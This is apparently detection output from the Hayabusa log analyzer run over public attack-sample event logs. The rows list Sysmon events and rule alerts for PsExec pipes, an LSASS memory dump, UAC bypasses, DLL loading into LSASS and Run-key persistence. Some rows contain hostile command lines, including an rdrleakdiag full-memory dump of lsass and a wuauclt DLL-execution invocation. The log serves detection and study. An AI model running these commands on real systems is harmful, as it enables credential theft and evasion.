Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx 2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx 2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx 2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx 2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx 2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx 2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx 2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,../hayabusa-rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx 2020-10-17 20:38:58.613 